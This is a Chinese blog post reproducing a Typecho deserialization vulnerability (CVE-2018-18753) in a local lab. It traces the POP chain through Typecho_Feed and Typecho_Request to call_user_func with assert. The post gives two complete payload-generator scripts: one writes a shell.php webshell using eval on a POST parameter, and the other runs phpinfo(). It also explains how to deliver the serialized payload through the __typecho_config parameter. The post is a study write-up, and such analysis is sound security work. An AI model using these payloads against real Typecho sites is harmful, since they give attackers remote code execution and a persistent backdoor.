<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="typecho反序列化漏洞分析, Made by jcxj">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>typecho反序列化漏洞分析 | Made by jcxj</title>
    <link rel="icon" type="image/png" href="/jcxj/favicon.png">

    <link rel="stylesheet" type="text/css" href="/jcxj/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/jcxj/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/jcxj/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/jcxj/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/jcxj/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/jcxj/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/jcxj/css/my.css">

    <script src="/jcxj/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.2"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/jcxj/" class="waves-effect waves-light">
                    
                    <img src="/jcxj/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Made by jcxj</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/jcxj/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/jcxj/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/jcxj/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/jcxj/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/jcxj/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/jcxj/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Made by jcxj</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/jcxj/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/jcxj/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/jcxj/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/jcxj/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/jcxj/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/jcxj/medias/featureimages/10.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">typecho反序列化漏洞分析</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/jcxj/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/jcxj/tags/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                                <span class="chip bg-color">php反序列化</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/jcxj/categories/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="post-category">
                                反序列化
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-09-29
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>Update Date:&nbsp;&nbsp;
                    2022-09-30
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>Word Count:&nbsp;&nbsp;
                    1.6k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>Read Times:&nbsp;&nbsp;
                    7 Min
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/jcxj/libs/prism/prism.css">
        

        
        <!-- 代码块折行 -->
        <style type="text/css">
            code[class*="language-"], pre[class*="language-"] { white-space: pre-wrap !important; }
        </style>
        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="php-typecho反序列化漏洞"><a href="#php-typecho反序列化漏洞" class="headerlink" title="php-typecho反序列化漏洞"></a>php-typecho反序列化漏洞</h1><h1 id="一-配置好环境"><a href="#一-配置好环境" class="headerlink" title="一.配置好环境"></a>一.配置好环境</h1><p>cve-2018-18753</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929161516021.png" class="" title="image-20220929161516021">

<pre class="line-numbers language-none"><code class="language-none">https:&#x2F;&#x2F;github.com&#x2F;typecho&#x2F;typecho&#x2F;releases&#x2F;tag&#x2F;v1.0-14.10.10-release
这里要注意:下载的是Source code<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929194515819.png" class="" title="image-20220929194515819">

<p>把解压出来的文件放到phpmystudy的根目录下并且在本地数据库中创建一个名为typecho的数据库</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929194541438.png" class="" title="image-20220929194541438">

<pre class="line-numbers language-none"><code class="language-none">然后去访问localhost&#x2F;typecho,无脑下一步即可安装
这里的typecho是把解压出来的文件夹重命名后的结果,没有重命名的话要按实际情况来访问<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929194719337.png" class="" title="image-20220929194719337">

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929194357972.png" class="" title="image-20220929194357972">

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929194803329.png" class="" title="image-20220929194803329">

<h1 id="二-源码分析"><a href="#二-源码分析" class="headerlink" title="二.源码分析"></a>二.源码分析</h1><img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929200513949.png" class="" title="image-20220929200513949">

<pre class="line-numbers language-none"><code class="language-none">1.找unserialize()函数,并且函数中的值是我们可以控制的
在install.php里的230行,出现了unserialize()函数
#双击shift快速寻找<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929202359836.png" class="" title="image-20220929202359836">'

<pre class="line-numbers language-none"><code class="language-none">
&lt;?php
$config &#x3D; unserialize(base64_decode(Typecho_Cookie::get(&#39;__typecho_config&#39;)));
Typecho_Cookie::delete(&#39;__typecho_config&#39;);
$db &#x3D; new Typecho_Db($config[&#39;adapter&#39;], $config[&#39;prefix&#39;]);
$db-&gt;addServer($config, Typecho_Db::READ | Typecho_Db::WRITE);
Typecho_Db::set($db);
?&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">$db &#x3D; new Typecho_Db($config[&#39;adapter&#39;], $config[&#39;prefix&#39;]);跟踪进去看看<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929221339703.png" class="" title="image-20220929221339703">

<pre class="line-numbers language-none"><code class="language-none">如果$adapterName是个类的话,这里就会自动调用__toString()函数<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">2.搜索__toString()函数<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929204202475.png" class="" title="image-20220929204202475">

<p>这里的toString有三种,一个一个去看;<strong>第一个Typecho_Feed</strong></p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220930121109076.png" class="" title="image-20220930121109076">

<p>关注到这两行,想到了get函数的利用</p>
<pre class="line-numbers language-none"><code class="language-none">__get()当访问一个类下没有的成员变量时自动调用<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>搜索一下__get函数</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929221624442.png" class="" title="image-20220929221624442">

<p>去Typecho_Request下面看看</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929205652772.png" class="" title="image-20220929205652772">



<p>看到调用了get,去看下get函数</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929205722823.png" class="" title="image-20220929205722823">

<p>get函数调用了_applyFilter()</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929205752213.png" class="" title="image-20220929205752213">

<p>在_applyFilter函数中,看到了call_user_func()函数</p>
<pre class="line-numbers language-none"><code class="language-none">$value &#x3D; is_array($value) ? array_map($filter, $value) :
                call_user_func($filter, $value);
这一句限定了$value不能为数组,因为是数组的话就不会调用call_user_func函数<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">3.找能利用的函数,这一部分就依靠前面的基础,
php代码执行:eval()、assert()、call_user_func_array()、preg_replace()、call_user_func()等函数
在Request.php下面发现了call_user_func()函数<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929201408722.png" class="" title="image-20220929201408722">

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929201810286.png" class="" title="image-20220929201810286">

<p>总结思路:</p>
<pre class="line-numbers language-none"><code class="language-none">1、通过install.php中的反序列化将adapter和prefix变量传入Typecho_Db实例化对象中

2、通过类Typecho_Db中的__construct魔术方法将adapter视作字符串拼接赋值，调用类Typecho_Feed中的__toString魔术方法

3、访问了_items[&#39;author&#39;]中的screenName属性，调用Typecho_Request类中的__get魔术方法并且传入$key&#x3D;screenName

4、定义$this-&gt;_params[$key]，也就是$this-&gt;_params[‘screenName’]为我们想要执行的命令，即可赋值给$value

5、定义$this-&gt;_filter，构成回调函数，执行命令<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">关于call_user_func()函数的简单示例
&lt;?php
    $b&#x3D;&quot;phpinfo（）&quot;;
    call_user_func($_GET[&#39;a&#39;]，$b);
?&gt;
当请求1.php?a&#x3D;assert的时候,call_user_func函数就会把$b当成assert()的变量传进去,导致命令执行 <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">1.Class Typecho_Feed中的$item[&#39;author&#39;]变量应该是Typecho_Request类

2.Typecho_Request类的__get()中有个$key,可以通过外部传参获得也就是;（1）
__get()调用了get(),需要初始化一个新的变量$_params,并且是$value&#x3D;_params[$key]&#x3D;&#39;phpinfo&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">(1)public function __get($key)
    &#123;
        return $this-&gt;get($key);
    &#125;
    这里的key是screenName
    因为$item[&#39;author&#39;]是Typecho_Request类，Typecho_Request类没有screenName变量,因此调用了__get()函数,并把这个没有的变量传给了__get()函数
$content .&#x3D; &#39;&lt;dc:creator&gt;&#39; . htmlspecialchars($item[&#39;author&#39;]-&gt;screenName) . &#39;&lt;&#x2F;dc:creator&gt;&#39; . self::EOL;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h1 id="poc1：无回显的情况-写个后门"><a href="#poc1：无回显的情况-写个后门" class="headerlink" title="poc1：无回显的情况,写个后门"></a>poc1：无回显的情况,写个后门</h1><p>思路：</p>
<pre class="line-numbers language-none"><code class="language-none">1.config应该是一个数组,里面两个元素
$config[&#39;adapter&#39;]&#x3D;new Typecho_Feed;
$config[&#39;prefix&#39;]&#x3D;&#39;typecho_&#39;;
2.因为调用了Typecho_Feed::__toString()函数,因此这个函数涉及的变量我们都得有
const RSS1 &#x3D; &#39;RSS 1.0&#39;;
const RSS2 &#x3D; &#39;RSS 2.0&#39;;
const ATOM1 &#x3D; &#39;ATOM 1.0&#39;;
const DATE_RFC822 &#x3D; &#39;r&#39;;
const DATE_W3CDTF &#x3D; &#39;c&#39;;
const EOL &#x3D; &quot;\n&quot;;
$this-&gt;_type&#x3D;&#39;RSS 2.0&#39;#根据源码中的的else if (self::RSS2 &#x3D;&#x3D; $this-&gt;_type)
$this-&gt;_items[&#39;author&#39;]&#x3D;new Typecho_Request;#调用Typecho_Request的get函数<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<pre class="line-numbers language-none"><code class="language-none">&lt;?php
Class Typecho_Feed&#123;
    private $_type;
    private $_items&#x3D;array();
#为了给$_items赋值,因此用构造函数
    public function __construct()
    &#123;
        $this-&gt;_type&#x3D;&#39;RSS 2.0&#39;;
        $this-&gt;_items[0]&#x3D;array(
            &#39;author&#39;&#x3D;&gt;new Typecho_Request()
    );
    &#125;
&#125;
Class Typecho_Request&#123;
    #因为call_user_func调用的是数组,$_filter&#x3D;&#39;assert&#39;要改为$_filter[0]&#x3D;&#39;assert&#39;
    private $_filter&#x3D;array();
    private $_params&#x3D;array();
    public function __construct()&#123;
        $this-&gt;_params[&#39;screenName&#39;] &#x3D; &#39;file_put_contents(&quot;shell.php&quot;, &quot;&lt;?php @eval(\$_POST[\&#39;a\&#39;]); ?&gt;&quot;)&#39;;    &#x2F;&#x2F;替换phpinfo()这里进行深度利用
        $this-&gt;_filter[0] &#x3D; &#39;assert&#39;;
    &#125;
&#125;
$exp &#x3D; array(
    &#39;adapter&#39; &#x3D;&gt; new Typecho_Feed(),
    &#39;prefix&#39; &#x3D;&gt; &#39;typecho_&#39;
);

echo base64_encode(serialize($exp));<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h1 id="怎么传参"><a href="#怎么传参" class="headerlink" title="怎么传参"></a>怎么传参</h1><p>回到源码,看install.php寻找传参点</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929220217127.png" class="" title="image-20220929220217127">

<pre class="line-numbers language-none"><code class="language-none">通过get方式随便给finish传一个东西
追踪Typecho_Cookie::get()<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220929220357764.png" class="" title="image-20220929220357764">

<pre class="line-numbers language-none"><code class="language-none">要嘛在cookie里传参,要嘛用post方式传参，参数名为__typecho_config
不能两个同时用
这里就先复现POST传参<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220930122009108.png" class="" title="image-20220930122009108">

<p>虽然没有回显,但还是命令还是执行了,生成了一个后门</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220930122036257.png" class="" title="image-20220930122036257">

<h1 id="poc2-回显"><a href="#poc2-回显" class="headerlink" title="poc2:回显"></a>poc2:回显</h1><p>回显比较麻烦,因为install.php调用了ob_start()开启了缓冲区，反序列化pop链执行后<code>phpinfo()</code>的内容没有立刻输出，而是先存在缓冲区里。</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220930124137941.png" class="" title="image-20220930124137941">

<p><strong>解决的办法就是执行phpinfo()之后，让程序报错，使其提前退出</strong></p>
<p>在Feed.php的292行开始</p>
<img src="/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/image-20220930123630539.png" class="" title="image-20220930123630539">

<pre class="line-numbers language-none"><code class="language-none">if (!empty($item[&#39;category&#39;]) &amp;&amp; is_array($item[&#39;category&#39;])) &#123;
                    foreach ($item[&#39;category&#39;] as $category) &#123;
                        $content .&#x3D; &#39;&lt;category&gt;&lt;![CDATA[&#39; . $category[&#39;name&#39;] . &#39;]]&gt;&lt;&#x2F;category&gt;&#39; . self::EOL;
                    &#125;
                &#125;
.&#x3D;的方法对象有str,boolean,int,当class类型.&#x3D;字符串的时候,就会出现报错
根据分析我们得到
1.要进入这个if的条件就是$item[&#39;category&#39;]为非空数组
2.$item[&#39;category&#39;]里的某个元素应该为类
$item[&#39;category&#39;]&#x3D;new xxx();
#这里的xxx随便哪个类都行,只要是源码中有的,当然不能是自己<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">&lt;?php
Class Typecho_Feed&#123;
    private $_type;
    private $_items&#x3D;array();
#为了给$_items赋值,因此用构造函数
    public function __construct()
    &#123;
        $this-&gt;_type&#x3D;&#39;RSS 2.0&#39;;
        $this-&gt;_items[0]&#x3D;array(
            &#39;author&#39;&#x3D;&gt;new Typecho_Request(),
            &#39;category&#39; &#x3D;&gt; array(new Typecho_Request())
    );
    &#125;
&#125;
Class Typecho_Request&#123;
    #因为call_user_func调用的是数组,$_filter&#x3D;&#39;assert&#39;要改为$_filter[0]&#x3D;&#39;assert&#39;
    private $_filter&#x3D;array();
    private $_params&#x3D;array();
    public function __construct()&#123;
        $this-&gt;_params[&#39;screenName&#39;] &#x3D; &#39;phpinfo()&#39;;    &#x2F;&#x2F;替换phpinfo()这里进行深度利用
        $this-&gt;_filter[0] &#x3D; &#39;assert&#39;;
    &#125;
&#125;
$exp &#x3D; array(
    &#39;adapter&#39; &#x3D;&gt; new Typecho_Feed(),
    &#39;prefix&#39; &#x3D;&gt; &#39;typecho_&#39;
);

echo base64_encode(serialize($exp));<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/jcxj/about" rel="external nofollow noreferrer">jcxj</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://jcxj.github.io/jcxj/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/">https://jcxj.github.io/jcxj/jcxj/2022/09/29/typecho-fan-xu-lie-hua-lou-dong-fen-xi/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint polocy. If reproduced, please indicate source
                    <a href="/jcxj/about" target="_blank">jcxj</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/jcxj/tags/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                                    <span class="chip bg-color">php反序列化</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/jcxj/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/jcxj/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">有没有好心人(dayuanzhong)v_me_50</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/jcxj/medias/reward/alipay1.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/jcxj/medias/reward/wechat1.jpg" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    
    <div class="livere-card card" data-aos="fade-up">
    <!-- 来必力City版安装代码 -->
    <div id="lv-container" class="card-content" data-id="city" data-uid="">
        <script type="text/javascript">
            (function (d, s) {
                let j, e = d.getElementsByTagName(s)[0];
                if (typeof LivereTower === 'function') {
                    return;
                }

                j = d.createElement(s);
                j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
                j.async = true;

                e.parentNode.insertBefore(j, e);
            })(document, 'script');
        </script>
        <noscript>为正常使用来必力评论功能请激活JavaScript。</noscript>
    </div>
    <!-- City版安装代码已完成 -->
</div>
    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/jcxj/2022/09/29/navivat-lian-jie-teng-xun-yun-shu-ju-ku/">
                    <div class="card-image">
                        
                        
                        <img src="/jcxj/medias/featureimages/15.jpg" class="responsive-img" alt="navivat连接腾讯云数据库">
                        
                        <span class="card-title">navivat连接腾讯云数据库</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-09-29
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            jcxj
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/jcxj/tags/%E8%A7%A3%E5%86%B3%E9%97%AE%E9%A2%98/">
                        <span class="chip bg-color">解决问题</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/jcxj/2022/09/29/php-fan-xu-lie-hua/">
                    <div class="card-image">
                        
                        
                        <img src="/jcxj/medias/featureimages/1.jpg" class="responsive-img" alt="php反序列化">
                        
                        <span class="card-title">php反序列化</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
